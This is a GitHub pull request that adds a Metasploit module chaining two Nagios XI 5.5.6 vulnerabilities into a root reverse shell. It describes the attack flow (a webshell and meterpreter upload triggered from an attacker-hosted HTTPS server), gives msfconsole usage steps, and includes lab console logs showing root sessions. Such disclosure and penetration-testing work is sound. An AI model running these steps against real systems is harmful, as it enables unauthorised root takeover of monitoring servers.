Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Nagios XI 5.5.6 Root Remote Code Execution Module #11987

Merged
merged 4 commits into from Jun 25, 2019

Conversation

Projects
None yet
2 participants
@yaumn
Copy link
Contributor

commented Jun 17, 2019

Add Nagios XI 5.5.6 Root Remote Code Execution Module

This module exploits two vulnerabilities in Nagios 5.5.6:
  - CVE 2018-15708 which allows for unauthenticated remote code execution
  - CVE 2018–15710 which allows for local privilege escalation.
When combined, these two vulnerabilities give us a root reverse shell.

The exploit works as follows:
- A local HTTPS server is setup. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours obviously), this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
- A command is executed thanks to the webshell. This command elevates privileges and run the meterpreter executable, giving us a meterpreter session.

Verification

To test the exploit, I used Ubuntu 18.04 LTS x64 in a VM and I installed Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).

  • Start msfconsole
  • use exploit/linux/http/nagios_xi_root_rce
  • set RHOSTS IP
  • set RSRVHOST IP
  • exploit
  • Verify you get a root shell

Scenarios

msf5 > use exploit/linux/http/nagios_xi_root_rce 
msf5 exploit(linux/http/nagios_xi_root_rce) > set RHOSTS 192.168.0.57
RHOSTS => 192.168.0.57
msf5 exploit(linux/http/nagios_xi_root_rce) > set RSRVHOST 192.168.0.50
RSRVHOST => 192.168.0.50
msf5 exploit(linux/http/nagios_xi_root_rce) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.50:4444 
[*] Using URL: https://0.0.0.0:8080/yXgRPrO9L8zIt
[*] Local IP: https://192.168.0.50:8080/yXgRPrO9L8zIt
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/oDRVURAY82YcT
[*] Local IP: https://192.168.0.50:8080/oDRVURAY82YcT
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 192.168.0.57
[*] Meterpreter session 1 opened (192.168.0.50:4444 -> 192.168.0.57:33162) at 2019-06-16 23:44:34 +0100
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.57
OS           : Ubuntu 18.04 (Linux 4.18.0-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

@yaumn yaumn changed the title Add Nagios XI 5.5.6 Root Remote Code Execution exploit Add Nagios XI 5.5.6 Root Remote Code Execution Module Jun 18, 2019

@wchen-r7 wchen-r7 self-assigned this Jun 18, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

Sorry for the wait. For some reason I ended up going down some silly path trying to install Nagios XI, but it turned out to be actually easy. Anyways, the module works fine for me:

msf5 exploit(linux/http/nagios_xi_root_rce) > check
[*] 172.16.135.129:443 - The target appears to be vulnerable.
msf5 exploit(linux/http/nagios_xi_root_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.135.1:4444 
msf5 exploit(linux/http/nagios_xi_root_rce) > [*] Using URL: https://0.0.0.0:8080/0sSXoIkeTo2
[*] Local IP: https://192.168.0.21:8080/0sSXoIkeTo2
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/1vmZQikrphTQHf6
[*] Local IP: https://192.168.0.21:8080/1vmZQikrphTQHf6
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:58494) at 2019-06-24 23:58:00 -0500
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  1         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 172.16.135.129  172.16.135.1:4444 -> 172.16.135.129:58494 (172.16.135.129)

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > pwd
/usr/local/nagvis/share
meterpreter > 

But I'll do a little touch up here and there to clean up the code a little bit (don't worry, just minor stuff!). And then I will land this pull request. Thank you @yaumn. It's a really cool module! :-)

@yaumn

This comment has been minimized.

Copy link
Contributor Author

commented Jun 25, 2019

No problem, thank you for your time!

@wchen-r7 wchen-r7 merged commit 8723775 into rapid7:master Jun 25, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Jun 25, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

Release notes

This module exploits two vulnerabilities in Nagios 5.5.6:

  • CVE-2018-15708: which allows for unauthenticated remote code execution
  • CVE-2018–15710: which allows for local privilege escalation.

When combined, these two vulnerabilities give us a root reverse shell.

msjenkins-r7 added a commit that referenced this pull request Jun 25, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

Some changes I made:

  • Module's filename changed to nagios_xi_magpie_debug.
  • Make the names of the files the exploit is uploading random.
  • Module documentation
  • Other cosmetic changes (like spacing)

@yaumn yaumn deleted the yaumn:nagios-xi-rce branch Jun 25, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.